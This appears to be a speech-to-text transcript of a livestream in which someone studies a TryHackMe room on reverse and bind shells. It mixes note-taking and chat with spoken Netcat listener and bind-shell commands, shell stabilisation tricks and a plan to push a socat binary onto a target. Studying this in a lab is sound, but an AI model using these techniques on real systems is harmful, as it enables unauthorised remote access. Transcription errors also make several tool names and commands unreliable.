let's start. So, what is a shell? But I know that this one is actually kind of interesting. There are advanced things to make notes of. Let's actually move the notes over to my right screen so we can switch easier. Because, yeah, let's move the screen back a bit there. Because, the point of this is to remember things, and I think I'm kind of got notes on this, but I might not might not have it on everything. So this is the shell bit, and this is kind of like common for both Linux and alright, I didn't start the phone. I didn't do the checklist. So let's see if it switches at once or if I'll have to watch 5 second ads first. It's probably trying to reconnect right now. Waiting. There. Now it should work. There. So I'm thinking this belongs in connection. Let's see. Yeah, we have shells here too. Meaning that I have this in several places. Because I also have this. Is it in web? Yeah, shells web and reverse. So I have it in several places. Maybe that's not good. At least we have this here, which should be here, and we'll probably have this, but we'll need to add notes, and I'm kind of thinking we could add a new one that's actually called just shells. And maybe that's the logical bit, because this is kind of both Windows and Linux, and I have most things split up later, on Linux and Windows. But the shell connection bit is not here. And also, maybe what we were using last time, which was Metasploit, should also be in this bit. Though it is kind of in here too. It kind of fits here. And shells kind of fit in the connection. Oh my, that's a lot of notes there. So let's just start with the connection bit and we'll see if we move it later.
Bash Dante 333 says,
Fixit 42 Wave.
Hi, welcome in. Bash Dante, welcome. So let's get started and let's make some notes and see, because I've used Netcat a lot, but I have never used Toolkit actually. I don't know if anyone does, but it's in here, and I did read this before, but let's start from the top again. So before we can get to the intricacies of sending and receiving shells, it's important to understand what a shell actually is. In the simplest possible terms, shells are what we use when interacting with a command line environment. In other words, in common bash or sh programs in Linux are examples of shell and cmd, exe, and PowerShell on Windows. When targeting remote systems, it is sometimes possible to force an application running on the server, such as a web server for example, to execute arbitrary code. When this happens, we want to use this initial access to obtain a shell running on the target. In simple terms, we can force the remote server to either send us command line access to a server, a reverse shell, or to open up on the server, which we can connect to in order to execute commands, a bind shell. Yeah, and I've used reverse shells a lot. I would like a better definition of which is which. Maybe I've used this, but I don't know it, you know? We will be covering both of these scenarios in further detail throughout the room. The format of this is as follows. The bulk of the room is made up of information, with examples given in code blocks and screenshots. And we need to make lots of notes, because I know there's lots of facts in here. There are 2 VMs, one Linux and one Windows, in at least 2 tasks of the room. These can be used to practice the techniques demonstrated. There are example practice questions in task 13. Feel free to work through these. Okay, so 13. Practice and examples. Or follow along with the tasks as you complete them. Yeah, we want to do it as we do them. So I'm curious about we have 2 practice boxes here. Let's see what we have first. Tools. There's a variety of tools that we can use to receive reverse shells and send bind shells. In other terms, so receive reverse shells and send bind shells. I guess the reverse and send might be the difference. We'll see. In general terms, we need malicious shell code, as well as a way of interfacing with the resulting shell. We will discuss each of these briefly below. Netcat. And I was kind of annoyed at Metasploit yesterday, since I couldn't use Netcat. Kind of like Netcat. Netcat is a traditional Swiss Army knife of networking. It's used to manually perform all kinds of network interaction. Actually, I thought to do that, but it got kind of late yesterday, and we raided Alhazred instead. It's because the last room was finished on the last part of these learning rooms. So let's read of the sentence. It is used to manually perform all kinds of network interaction, including things like banner grabbing during enumeration. But more importantly for our users, it can be used to receive reverse shells and connect to remote ports attached to bind shells on a target system. Netcat shells are very unstable, easy to lose by default, but can be improved by techniques that we will be covering in an upcoming task. Well, after yesterday's using my goodness, Eternal Blue, it's kind of, everything will be stable, because they kinda die sometimes. And migrating those Metasploit shells, those kinda, or connections, were kinda not stable. I've never had any problems with Netcat, except for like pressing Ctrl-C like once or twice maybe. But just being able to reconnect again, so no problem. Yeah, and I have my breakfast here too, so I shouldn't forget to eat something. SoCat. SoCat is like Netcat on steroids. So why have I never used it? No need, I guess. It can do all the same things and many more. SoCat shells are usually more stable than Netcat shells out of the box. In this sense, it is vastly superior to Netcat. However, there are 2 big catches. The syntax is more difficult. Netcat is installed on virtually every Linux distribution by default. SoCat is very rarely installed by default. So, 2 good reasons not to use it. There are workarounds for both of these problems, which we will cover later on. Both Socket and NetGAD have exe versions for use on Windows. Metasploit. Multi-handler. Yeah, we used this yesterday. The exploit multi-handler module of Metasploit framework is, like Socket and NetGAD, used to receive reverse shells. Due to being part of the Metasploit framework, multi-handler provides a fully fledged way to obtain stable shells. Depending on how you connect, I assume, with a wide variety of further options to improve the caught shell. It's also the only way to interact with the MeterPreter shell, which is its own thing, so why even mention it? And it's the easiest way to handle staged payloads. And I really need to understand more about what they mean by that. Okay, sending a bit first and then some more later to get a tiny thing at first, but if you're doing basic reverse shell, it's not that big, right? Both of which we will look at in task 9. Okay, I have to look at the ones I have not. MSF Venom, so done these things, next steps, practice examples. Well, we'll see if there's anything new. What feels the most new to me is the Socket thing. And I'm kind of glad having answered these questions already, so I'm not reciting it. I think it's like long commands, you need to make without the test box even to try stuff on. So, or we have them at the end, of course. So, good morning, everybody. I don't think I said good morning. And I know you might be in a different time zone, but for me it's early morning. So, yeah, MSF Venom. Like multi-handler, MSF Venom is technically part of the Metasploit framework. However, it is shipped as a standalone tool. MSF Venom is used to generate payloads on the fly. Whilst MSF Venom can generate payloads other than reverse and bind shells, these are what we will be using in this room. MSF Venom is an incredibly powerful tool, so we will go into this application in much more detail in a dedicated task. And I guess there are rooms for it too. And you use it kinda sometimes. Aside from the tools I'm just checking the message there. So aside from the tools we've already covered, there are some repositories of shells in many different languages. One of the most prominent of these are Payloads All the Things. And I know I have this probably already open, but let's... And we have Pentas Manga's reverse shell cheat sheet. So let's just open those. In addition to these online resources, Kali Linux also comes pre-installed with a variety of web shells located. Okay, I didn't know this. This is good. So let's actually look there. We have Kali up here already. So let's just look at this. So USR, share, and web. Oh, right. Several directories. I should have just typed it. It would have been faster. So, okay. So, web shells. I have to actually see what else do we have in here that I don't know. Cause there's probably lots. I'm just looking at if it's like a reverse shell directory too, since there's a web shells one. Let's just read this quickly. Or not quickly, I guess. Okay, let's not read it now, because you'll die from boredom, right? So we have ASP, ASPX, CFM, YASP, Pseudonym, Perl PHP, and so Seclist has a web shells too. I guess we'll look at these, making sure you're on the right place where I am. So there, let's cat cmd. So not a very long file, but I guess if we have an ASP, running, we can use this. ASP cmd shell on ISS 5.1. This is great to know that these are here. Well, that was good. So what was the other name? It was like cmd something there. Well, we have these, and now I know about them, but let us add this directory to our information in our notes. So I'm just going to copy that, and let's tab to the notes. And where we have the reverse shell notes, I don't like to have it in two places, and they do have it in the web exploration. So maybe I should actually move this up to connection, because it's not actually on the web most of the time, right? Maybe we might upload it, but it's still a part of the connection. So let's move this bit here, and I'm going to be like, where did I put that? Right? So maybe we should make a special one, because this is kind of big thing. It's a kind of big thing. So what number did we have on these? So Wi-Fi is kind of in the wrong place, and I've been sorting these. Let's actually put this. The funny numbers is because I've been sorting them. So let's just rename this to .4 instead, and we'll pop it above there. And that's the new one that I actually created. Let's call it 1.6 then, I guess. So it's between connection and web exploration, not exploitation. And the new one here, untitled, let's rename it to 1.4. Let's just call it shells there. So now we have a special one for shells. And what we had, no, I was going for 1.6, right? I just had this in my head. And why is this 0.1? Anyway, we need to do 0.1 here too. 0.1.6. That's very long memory I had. So all of these should actually be, can I select several? No, it can just do one at a time. So let's do the one at a time. Anyway, sorting the note is kind of good, because if you can't find things, that's very useless to even have something. And I'll have to shake through this. So connections, this is empty now, so let's delete that. Oh, I did click delete there. So passwords, yeah, let's these things be there with connection. Maybe this should be connection and shells. We'll see. For now, we kind of have a lot of things here. And I have the link, I think, in the memory still. So let's add this. We actually have this on Kali. So on Kali, so we know those kind of obvious, but still, we have the rev shells, we have Pandas Monkey, and the ones that were suggested here Let's make sure we don't have this one in there. Though I know I used this kind of recently for Node.js. Yeah, I think it was Node.js. Let's copy this link and add it into the notes, and we already have the Pentest Monkey one. I think we have that one. So I'm just pasting here. And apparently we did have it already. So if we copy the Pentest Monkey URL just to compare here, we don't actually have exactly this one, though if we look here, yeah, it's actually this. Web Archive. So we're actually in the Wayback Machine now. Has this been removed? Let's see. So they wanted to make sure that their link would continue working, or what? Why did they send us this link? Whatever, let's remove it again. So to continue on with the notes, right, we could just quickly go through these. We don't have obviously double things. Yeah, this is the Node.js one that I just mentioned. Perl, PHP, yeah, and PHP web shells, and just generally on the reverse shells. So this will probably be the same as this in part. There we have Rel shells. SSH file put on Git, put on machine. So these, let's just cut these and put them in the links one, because these are like more like where to find links and stuff. They're very officially looking text. And then we can remove this one because it's empty. And this I have to still check out. And yeah, I did this note kind of recently too, because you know it's good too. And if we read through all this and we haven't found it, we go into the where to find, which is kind of logical. So thanks for having a W. So now we're going to look at the rest of this room. So this was new and cool to me. Do I have the checklists? We realized already, so let's go back to Kali here. We realized already that we have this, right? Because we saw this. And I can imagine what's in these ones. Though I don't really know what CFM is, error laudanum. But now we know to look here. I don't want to dig into that right now. So sec lists, and we look at this. Okay. I'm assuming that this means that CFM and laudanum and vTiger that I haven't heard about are also some kind of systems here. So if we go to WordPress, I do have a WordPress. We could try this on, though it's kind of updated, unfortunately. Well, let's just get one of them. Tiny one. Your password here. Well, if the request is from Softacos. What? Require. Well, yeah, I'm not going to exit, but let's go here. So we know what we have there. And let's go to the notes again. We can also click this, of course. And we can see what I assume is the same thing. Web shells. And here we have the directories we saw on the machine. So that would have been a quicker way maybe to go there. So let's continue. At a high level, we are interested in two kinds of shell when it comes to exploiting a target: reverse shells and bind shells. Reverse shells are when the target is forced to execute code that connects back to your computer. On your own computer, you would use one of the tools mentioned in the previous task to set up a listener, which would be used to receive the connection. The reverse shells. Good morning, Christy.
Christy says.
Morning, O slash.
So I'm repeating
Christy.
Yours.
Yeah, me too. I should actually at least drink my Nippon soap, whatever you call it in English, I don't know. I have yogurt too. What's your breakfast? Let's see. Set up a listener. Reverse shells are a good way to bypass firewall rules that may prevent you from connecting to arbitrary ports on the target. However, the drawback is that when receiving a shell from a machine across the internet, you would need to configure your own network to accept the shell. This, however, will not be a problem on the TryHackMe network due to the method by which we connect into the network. Bind shells are when the code executed on the target is used to start a listener attached to a shell directly on the target. So, I'm still sweaty on my neck. Still warm from the shower. Let's get some bread too. This is my last bread of this kind. I have quite a few of these bags now. Or well, I have used quite a few. I haven't saved them. And the bread is almost getting hard already. Smelling good though. So what was that?
I'm having coffee.
Coffee's not breakfast. Is there actually like energy in coffee? Except for yeah. I shouldn't say much. I've just had almost nothing so far.
Water and coffee.
Okay, then you're getting a lot of energy. Water is much more energy filled than coffee.
Till 3 to 4 p.m. Smile, smile.
Uh-huh. Oh my god, right, you had that diet thing. Oh my god. I wouldn't function. No way. But your body gets used to it, I guess, and we're kind of built to be able to work without getting food all the time. I guess.
Is used to it since a long time.
Yeah, I get that. And it's kind of a natural thing to, like thousands of years ago, like we were just walking there for, oh, there's some blueberries. Oh, look, we found whatever food. Or caught whatever food. So, let's continue. So bind shells are when the code executed on the target is used to start a listener. So not an hour. We don't start it. Once more. Let's bind shells are when the code executed on the target is used to start a listener attached to a shell directly on the target. This would then be opened up to the internet, meaning that you can connect. Okay.
Is obsidian on scene?
Right, it's not. Thank you. So I've just been reading this. But probably the last one too, maybe. But there were links. So we just checked our links that we had all of these links at the bottom here. And we added something. Right, because I didn't know that we had the user share web shells on Kali. Now I know. So, for the fourth time, bind shells are when the code executed on the target is used to start a listener attached to a shell directly on the target. This would be opened up to the internet, meaning you can connect to the port that the code has opened and obtain remote code execution that way. This has the advantage of not requiring any configuration on your own network, but may be prevented by firewalls protecting the target. And I don't think I've used this on anything yet. So I guess we mostly assume that firewalls would block stuff.
Bind on victim, rev on attacker.
Yeah. So as a general rule, reverse shells are easier to execute and debug. However, we will cover both examples below. And I don't really care what things are called, as long as... But maybe I should remember bind shells, Maybe I shouldn't put it in my notes, but I think I
Bind
remember
shells are
now.
much more stable shells.
Yeah, because it's like we're running a server. Setup server. So of course, don't worry too much about the syntax here. We will be looking at it in the upcoming tasks. Instead, notice the difference between reverse and bind shells in the following simulations. And of course, I totally focused on the syntax and wanted to understand everything before I went on to the next part. So that's why these kind of things take a lot of time for me usually, but now this is the second time around, so hopefully quicker for you. Let's start with the more common reverse shell. 9 times out of 10, this is what you'll be going for, especially in CTF challenges like those on TryHackMe. Take a look at the following image. On the left, we have a reverse shell listener. This is what receives the connection. So, before we continue reading, let's look at it. The left, right. So, we're Muri at Oguri. And they start Shell. Connect to. Right. This is what receives a connection. On the right is a simulation of sending a reverse shell. This is more likely to be done through code injection on a remote website or something along those lines. Picture the image on the left being your own computer and the image on the right being the target. So, yeah. And last time I had never seen this. Last time I read this, so it was all new, and there was a lot of like -e's and things, and I was like, "What's this?" But now I just recognize everything. So this is why it's nice to like repeat things later. So notice that after running the command on the right, the listener receives a connection. Then the my command is run. We see that we are executing commands as the target user. And the important thing here is that we are listening on our own attacking machine and sending a connection from the target. And then we have the bind example. Bind shells are less common but still very useful. Once again, take a look at the following image. Again, on the left we have the attacker's computer, on the right we have the simulated target.
Mornings are better for theory. Binds info better in the brain shells. D.
I think that's definitely a personal thing, if you work better. Because I'm usually tired in the morning, and yesterday I was tired after lunch. But then in the evening, then my brain starts working, you know? So it's kind of annoying, because when I'm going to bed, that's when my brain works the best. And it just works, and I'm not tired. So, but I still had to like
LOL.
leave Alhazra stream because I think, okay, I have to get up in 5 hours. I need at least, or you know, a bit more than 5 hours. So I think I got like almost 5 hours of sleep. And that's a bit too little. I want 6 hours. Annoying. Very annoying. But I'm thinking that instead of getting up later, that I used to do before I started streaming like this, I think we'll see what I'll do, if I'll change things again. But since I have to leave on Mondays and Wednesday with my kid at 13:15, then I have to make like lunch at 12, and then if I just start streaming like 9, then it's nothing. It's not much. It's just like 10, 11, 12, you know, and I want to stream longer than 3 hours. And also on Tuesdays, Thursdays, and Fridays,
streamed like
I want
10
to.
hours or more.
Yeah, it was about 10 hours. 10 hours and 1 minute. So, and I've heard for some people, you know, it takes energy to stream. For me, it's just fun. So it doesn't take any energy from me. I get energy from talking to you guys. So it doesn't matter that it's a long stream. I don't get tired from it. It just motivates me to actually do the learning. To study instead of going like, oh, let's this Facebook thing, I should probably check this out. 2 hours later, alright, maybe I should do some of that studying I should do, you know. Well, so this is like more focused, right? Not that I'm saying that. I really think people should take those breaks and just take 2 hours to do nothing, because your brain needs it too. But then I have today, all my afternoon will be like doing other stuff. Though I do have a meeting for my
Yay,
kids.
studying is fine on stream, or gaming, but solving challenges is exhausting while having plebs on your head.
No, I don't think so. I don't think so at all. And I would never do gaming, I think. Maybe. But I'm kind of trying to use my time more wisely than gaming. But if that's how you relax, you need it, of course. We all need to relax.
Yay, after work, don't need more work.
Okay. But so that's, you do gaming, you don't do like, what could I think of? Like social medias, looking at movies, doing things with your family. I don't really have time for games. If I want to study, then I would have to, take that time to play games. I should really. I just before I showered, I finished my kids' calendar. I made this image for us. We going to meeting here. Right, I didn't even send her
Sometimes.
this. Oh, there. So, so you have to do that kind of thing too. Let's go back to the study. I'm just making sure I'm on the right place. Yeah. I'm so sorry. I felt like I was going to burp. Yeah. Sorry. I don't usually do that. That's very odd. So, bind shell example. Bind shells are less common but still very useful. Once again, take a look at the following image. Again, on the left we have the attacker's computer, and on the right we have the target. Just to shake things up a little, we use a Windows target this time. And this is not the right place to shake it up, because this is something we're totally new to. So this is a bad teaching decision in my thoughts. Especially when I read this the first time, I was like, what, Windows? What are we doing? So let's read this. First, we start a listener on the target. This time, we're also telling it to execute CMD.
Me life is a bit different, but yeah, it depends what or how I can spend time after work.
Yeah, okay. Yeah, I know that when I was like... Yeah, but I've always been like, I like programming, but I don't like programming games. I wanted to like other programs, like for learning Japanese or something. So it's mostly like I like learning. So learn to make better ways to learn. Oh well, or trying to learn some music thing or whatever, and learn martial arts, of course. So we start a listener on the target. This time we're also telling it to execute cmd.exe. Then, with the listener up and running, we connect from our machine to the newly opened port. So, and now, since I've seen people's streams and have more experience myself, I recognize the words, more, and it's more understandable. But why switch what you're using for someone who's never seen this before and it's complete beginner path? I don't get it. On the target. But I guess they've just pulled these rooms into there. And you need this information as a prerequisite to something much earlier in this path. And here it's in general. This is not where we are, so let's just click here. So this is a complete beginner path. I'm curious now. When did we need this? I think it's somewhere here. It says that you need to do these rooms first, and it's one of them is the one we were at now, which is later in the same path. So that's not logical. And I think when I did it the first time, I probably sent Slim a message telling him that. So were we on types? Yeah. So on the attacking machine, this is the reverse shell. On the target, we do NC. So where is it? So they are just confusing us by having the login to the machine in here. Which I don't think that I understood the first time, because I'd never seen this, you know. Because this is beginner stuff.
Walking
Yeah,
dog
do
meow.
that, Christy. And I'm sorry for critiquing things there, but I don't just, you need to be pedagogical when you teach people stuff. So, so we on the machine here, we do -E CMD, and it's listening on Annie 8080. And then we have as compared to doing it here from unknown, listening to Annie on 443, and here we're doing it on 8080 instead. And CMD EXE, did it say anything about the CMD EXE? We're telling it to execute CMD EXE. So why do we need to do that? Wouldn't that be the default thing? Because, we don't have to do that when we're doing it this way. Well, we'll see what continues after this. And then on this machine we just do NC and IP import. And we get into the CMD. I'm still curious what would happen if we just remove this bit. And I guess we can try that later when we go to the test machine. So, as you can see, this once again gives us code execution on the remote machine. Notice this is not specific to Windows. So why did they then complicate things by using Windows? The important thing is to understand that we are listening on the target. And this is so obvious, so I don't get why they say it, then connecting to it with our own machine. But why complicate it with Evil WinRM in the connection bit? They could just have had a Windows prompt. They didn't have to make it, complicated with new things that they probably never heard, and I didn't never heard before when I looked at this first time. So, I'm dropping that now. The final concept which is relevant in this task is that of interactivity. Shells can be either interactive or non-interactive. Interactive. If you used PowerShell Bash, ZSH, SH, or any other CLI environment, then you will be used to interactive shells. These allow you to interact with programs when executing them. For example, take the SSH login prompt. You can see it's asking interactively that the user type either yes or no in order to continue the connection. This is an interactive program which requires an interactive shell in order to run. Non-interactive shells. So let's just compare what they're actually doing here. So, because how do you start a non-interactive shell? Non-interactive shells don't give that luxury. In a non-interactive shell, you're limited to using programs which do not require user interaction in order to run properly. Unfortunately, the majority of simple reverse and bind shells are non-interactive, which can make further exploitation trickier. I have not yet faced this problem, I must say. Let's see what happens when we try to run SSH in a non-interactive shell. Why would we? Notice that the whoami command, which is non-interactive, executes perfectly, but the SSH command, which is interactive, gives us no output at all. As an interesting side note, the output of an interactive command does go somewhere. However, figuring out where is an exercise for you to attempt on your own. Suffice to say that interactive programs do not work in non-interactive shells. Additionally, in various places throughout the task, you will see a command in the screenshots called listener. This command is an alias unique to the attacking machine used for demonstration. And this is also stupid. Why use an alias when you're trying to teach something to someone? Repetition of the actual command, wouldn't that be better? Sorry for complaining. This command is an alias unique to the attacking machine, used for demonstration. This is a shorthand for typing sudo oralwrap nc lvnp 443. And oralwrap is on my list of things to look at. Right here. Yeah, so I've started researching it, but I haven't installed it yet. But they didn't explain what it is here, I think, which will be covered in an upcoming task. It will not work on other machine, so why use it then? Let's skip the questions. They're not useful. So always when I find myself not agreeing with how they have done things pedagogically, I'm thinking I should do something myself. So that's what my brain keeps popping up. If you're complaining, make a better one. I could like live on Nippon Soppa. Very good. Right. I should take allergy pills. Going outside today too. I take 2 different allergy pills to see hope that they work better, you know. Damn allergies and spring. So I think what I'm most curious now is the E part of with the CMD on Windows for Netcat. But it doesn't seem to be mentioned, like here at least. As mentioned previously, Netcat is the most basic, and I'm looking at the right screen, right? Basic tool in Pentester's toolkit when it comes to any kind of networking. With it, we can do a wide variety of interesting things, but let's focus for now on shells, reverse shells. In the previous task, we saw that the reverse shell require shellcode and a listener. And here also they pop a new word in that they have not explained. There are many ways to execute a shell, so we'll start by looking at listeners. The syntax for starting a Netcat listener using Linux is this. So now I understand what they're saying in this room, but I didn't the first time. It was just like they were explaining something in Greek. What? You know? The syntax for starting a Netcat listener in Linux is this. Let's actually read this. L is used to tell Netcat that it will be a listener. V is used to request a verbose output. N tells Netcat not to resolve host names or use DNS, explaining this with this is out with okay, let's go on the road. So they don't assume that we know what host names are, but they use the name shellcode with no explanation. Okay? The logic of this. P indicates that the port specification will follow. The example in the previous task used for 443, realistically you could use any port you like as long as there isn't already a service using it. Be aware that if you choose to use a port below 1024, you will need to use sudo when starting your listener. That said, it's often a good idea to use a well-known port number 80, 443, or 53 being good choices, as this is more likely to get past outbound firewall rules on the target. A working example of this would be... Oh, I've never used this. That's the one I always do. We can then connect back to this with any number of payloads, depending on the environment on the target. An example of this is displayed in the previous task. Bind shells. How much would it cost to not make us open the last one, but to actually type it, repeat it as repetition? Bind shells. If we are looking to obtain a bind shell on the target, then we can assume that there is already a listener waiting for us on the chosen port of the target. All we need to do is connect to it. The syntax for this is relatively straightforward. So, and I was so annoyed still, so I didn't even listen to what I was reading, so I'll just read it quietly again. Oh, there was nothing except what I already... Okay. So, we're connecting to a listener here. Here we're using Netcat to make an outbound connection to the target on our chosen port. We will look at using Netcat to create a listener for this type of shell in task 8. What's important here is that you understand how to connect to a listening port using Netcat. Yeah, so the E part is in task 8 that I was interested in. A Netcat shell stabilization. So, we've caught or connected to a Netcat shell. What's next? These shells are very unstable by default. Pressing Ctrl-C kills the whole thing. They are non-interactive and often have strange formatting errors. This is due to Netcat shells really being processes running inside a terminal rather than being bona fide terminals on their own right. Fortunately, there are many ways to stabilize Netcat shells from on Linux systems. We're looking at the 3 here. Stabilization of Windows reverse shells tends to be significantly harder. However, the second technique that we will be covering here is particularly useful for it. And I'm thinking maybe, where do I have my notes on this? That's what I'm thinking. And I don't think it's here, but I think it's in maybe in Linux exploration. Yeah. So should we move this to shell? Because this is not really Linux at all. So if we close this one down, I think we should be able to, because this doesn't scroll. It's so stupid. It doesn't scroll. So we need to be able to reach it. And if you right click and move, you can only move it to a top level one. Which is a bug. It's definitely a bug. Anyway, so this is in the right place now, I guess. Only that I have to remember that it's actually in that place. Just quickly scrolling. Everything is connected, you know. That wasn't the wrong place to be either. I think I might have put it in my start here. No. Yeah, it's here, you see? So stabilize is in my start here. So if we just copy this bit and make sure we actually have all of that information in this one, we don't. So before, when I was looking for this information, and this is for specifically for Linux there with the Python theory, and also it's anyway that. So let's just remove this as old. So we have fixed some notes and found what I didn't find before too. That's nice. So technique 1, Python. The first technique where we'll be discussing maybe I am tired, it's morning, which uses Python to spawn a better featured bash shell. Note that some targets may need a version of Python specified. In this case, replace Python with Python 2 or Python 3 as required. At this point, our shell will look a bit better, but we still won't be able to use tab autocomplete or arrow keys, and Ctrl-C will still kill the shell. So that's why we have step 2, export xterm. This will give us access to the term commands such as clear. Finally, and most importantly, we will background the shell using Ctrl-C. Using our terminal, we will use TTI, raw, echo, FG, and that's what I have in my notes too. But it's just a different order. This does two things. First, it turns our own terminal echo off, and then it foregrounds. But yeah, there it said that. Completing the process. Full technique can be seen here. And now they're showing they can do SSH now. And type yes, because now it's interactive. So this actually makes, I should add this to my notes, that this makes it interactive. because I've never thought about that it's actually is not interactive. And make it interactive. Kinda good thing to have there. And let's keep this here too. So there. And this could also be called like stabilize and interactive. Well, I might rename stuff later. Leaning back so much that I want the table to be lower. Actually, I'm going to quickly. I printed that schedule that you saw. It's kind of light. I think there's a setting in the printer, the new one that we got Sunday, that it's not to use a lot of toner. But I'll still give this to my kid, so I'll be right back.
Woof woof.
Jag släcker i taket igen då, okej? Min dumma mage. There, so he's kind of prepared a bit there now. And I took this opportunity to take a bathroom break too. But I'll have to print that better. His schedule. And I'm thinking I'll print like 3 months. So we can see what things like dentist appointments are at. So let's see. Yeah, so let's read this. Right, this is a Python, and they do the export at once. Export term, exterm. My God, why am I burping? What did I eat? SSH shell at localhost. Localhost. Note that if the shell dies, any input in your own terminal will not be visible. As a result of having disabled terminal echo. To fix this, type reset and press enter. Technique 2, RLWrap. RLWrap is a program which, in simple terms, gives us access to history, type completion, and arrow keys immediately upon receiving a shell. However, some manual stabilization must still be used if you want to use Ctrl-C inside the shell as well. RLWrap is not installed by default. Sudo apt install RLWrap. And I've been to the GitHub and read stuff about this, and I did have no memory. I think I kind of like just focused on getting the the netcat bit here the first time. And this was just Greek, you know. So we just put it before the command. Preparing our netcat lesson RLWrap, yeah. Gives us much more fully featured shell. This I think is particularly useful for dealing with Windows shells, which are otherwise notoriously difficult to stabilize. When dealing with a Linux target, it's possible to completely stabilize by using the same trick as in step 3 of the previous technique. Backward the shell with Ctrl-C use. Use stdy raw echo fg. So let's add RLWrap here because I haven't. So this is not really an upgrade, so maybe we should do now we're in shell, so we don't need to add the shell bit, so just let us say like stabilize let's be specific. Python stabilization. Now Python stable and interactive. That's one way, you know. And then we have let's do the same, you know, with RLWrap. And we don't have to add that text really. So this is the installation. So installation, and then we won't use installation as much, so let's put it below. Add arrow keys, command completion, and history. And this is from the GitHub there. So what we're actually doing, we're doing RLWrap command. Let's what can we use that it won't think is crazy? We won't find anything, so let's make it a command thingy, and then we can use like command, or well, command. So actually what we mean is our wrap nc LVMP, and then they have used those, so well, whatever. But maybe we should use these. I guess the command is not optional, right? So not, this is import in there. Can't handle ctrl plus c. Needs stty roll ctrl plus c roll minus echo fg for Linux, and I'm changing my mind. For Linux, do like italic, and this is a command there, and let's set a space for aesthetics to stabilize and re-enter shell. And then apparently there's a big blank here for Windows. Though I'm usually very pleased with the non-stabilized shell, but someone told me that I should practice doing that, which is right. It's totally correct. Technique, SOCAD, but I do not know anything. I don't remember anything. More than it's kind of similar to Netcat, right? So let's read this bit again, because it was months ago. The third easy way to stabilize a shell is quite simply to use an initial Netcat shell as a stepping stone into a more fully featured SOCAD shell. So you still do Netcat then. Bear in mind that this technique is limited to Linux targets. 130 already. As a SOCAD shell on Windows will be no more stable than a Netcat shell. So let's do and make a note for SOCAD. And it's actually only useful on Linux then. And we already have good ones for Linux. Why would we need this? Let's have a mention of it, and we'll see if we ever use it anyway. At least it will be easily accessible, right? So let's make Linux, right? Also, I should update my GitHub. Haven't done that in a long time. No updates. All them changes nowhere else. So let's continue reading. Bear in mind that this technique is limited to Linux targets. As a socket shell on Windows will be no more stable than a Netcat shell. To accomplish this method of stabilization, we would first transfer a socket compiled binary. And we got a file, which is not what I wanted. So let's copy the link. The duplicate tab is a trick to get the new tab to be just behind. And we don't want the raw. There. We can view raw. And then we get it again. Binaries, static binaries. Lots of updates here. This repo contains a bunch of statically linked binaries with various tools. So apparently this person is using these.
Bash Dante 333 says.
Pause please, I'm watching ads.
Fixit says.
Pausing.
Right, I realized that I did not use this today, so you've been listening to an echo. You can just tell me.
Bash Dante 333 says.
Less than 3.
So if you're back, you can tell me.
Okay, thank you so much, I'm back.
Oh, great, great. Thank you for being here. I'll take another bite and then go back.
Sorry for the interruption.
No problem. I took the opportunity to eat a bit of my breakfast before the hours passed even more. Oh. There. So, let's continue. So this person have these tools compiled here. I'm just reading here. Getting a static build of Python that works is hard. Yeah, so I'm thinking that we have this link to this place. Should we put this in our notes? It might be useful sometimes. We might think like, where was that thing? But where in our notes should we put it? These are most definitely Linux, right? But it's also not really exploration. So maybe we should put it in Linux and have like a compiled binaries. They're compiled binaries, and then we just put this link to this repo here. So if we need it, and well, it's here. Oh my, right, we have all these old things still here. And this were from yesterday too. And I didn't check this one today. But I did set the stream title yesterday because I knew that I would be tired on the morning. So, let's continue. So, going back here, I'm thinking that we won't need this now. We'll see if we'll need it later. And we kind of downloaded it twice. Let's delete one of them. So this was alright from yesterday. The third easy way to stabilize a shell, and we kind of got here then, right? A version of the program compiled to have no dependencies up to the target machine. Yeah, we would transfer to accomplish this method of stabilization. We would first transfer a compiled binary of the socket, version compiled to have no dependencies up to the target machine. A typical way to achieve this would be by using a web server on the attacking machine inside a directory containing our socket binary. And I'm thinking this link, let's also put it in the notes here, because we made this, right? Get binary, upload to what did they call it? Target. Okay, let's go with target machine. Let's do the normal. Just pressing the wrong keys here. There, that's what we wanted. So if we do just, let's add this one in case we didn't remember it. And another practice typing this for my fingers. Though, since you know I never type it, because as soon as I do, I never use sudo with this. And I don't use port. So let's change this to what I actually use. So there, we only need sudo for the port 80. So let's not use it. Typing passwords when we don't need to. Why? Yeah. Well, not for example, because we'll definitely use that, right? So let's go back and look where we are. Then on the target machine, using the netcat shell to download the file. On Linux, this would be accomplished with curl or wget. We can just add this to the notes, of course. So I'm thinking from simpler NC shell, right? Upload socket binary to target, and then yeah, let's just type the command. Like we get I usually just do 10 10 10 10 to symbolize an IP, because that's more easy to change than, you know, having like they do with local IP. So and then let's also add the curl command, but I don't know it in my head. TMP SoCAD, but that's a good research, you know. We can also do it, because I'm feeling that I lack knowledge here that I should have. I should remember how to download it. So we are on the right screen, so I can just switch to the VM here. And let's look at curl. Right, we need all there. Oh, will that help? So, options URL, and what we need. I'm looking for like download, you know. Put the post data in the URL and get header help. I should look at like what I have in my history, possibly, but possibly not. I probably didn't download stuff, but on other machines, right? I'm also thinking that this is actually a job for ChatGPT, because it's a specific question that it couldn't easily mess up. So let's actually do that. And I did use it yesterday. Let's open a new window. Have to switch screens too. Linux download file with curl syntax. Let's also do Kali, because no, we don't want that. We want Linux general, because it might be differences, but this is, it's O there too. Yeah. So this is kind of a good example. We don't need to read the rest. Just examples are enough to understand it, right? This will download with the same name. So maybe this is enough, really. So let's go back to the notes. Or right. Let's ask it the same question. And so this will be our own machine, not a COM address. Well, since I kind of know my machine's possible IP, we can just do this one. because, you know, simplicity. If I would ever copy this. So here we also assume that it's here. Let's assume that here too. If we go back here, we see that this is capital O and this is lowercase o. And so for the purpose of learning, I'm going back here and looking at these. So here we have O, lowercase o. File to write to instead of stdout, output dir. Directory to save files in. So it can also be a directory, like tmp then. Wherever we have write permissions, it might be good to have that as they have in their example. Remote name write output to file named as remote file. And this is not as useful actually here, because we kind of assume to write it to the current directory, right? But we would probably be in the directory. But if we're not, I'm also thinking, should we add notes here for... Notes is the thing, you know. If you're like, oh my god, how did I do this? And you happen to have notes. That's nice. I'm thinking I might have curl in my normal Linux commands. Or maybe I have it in my web notes, since it's actually, you know, web. Yeah, we have curl here. So we could add, oh, we have wget too. Yeah, because that. And curl. So let's add this information. And here we have the full curl. Full curl and basic curl. And here in the basic one, we have these information. So we didn't have to do all. Maybe that's a good learning too. Don't start with the most basic help. You know? So why is there an IP here? Why? I'm very curious. Why did I do this? Let's just remove that. Did I paste the wrong thing maybe? So L is follow redirect. O is file name. O their name, and O uses file name and current dir. A tiny question mark there. 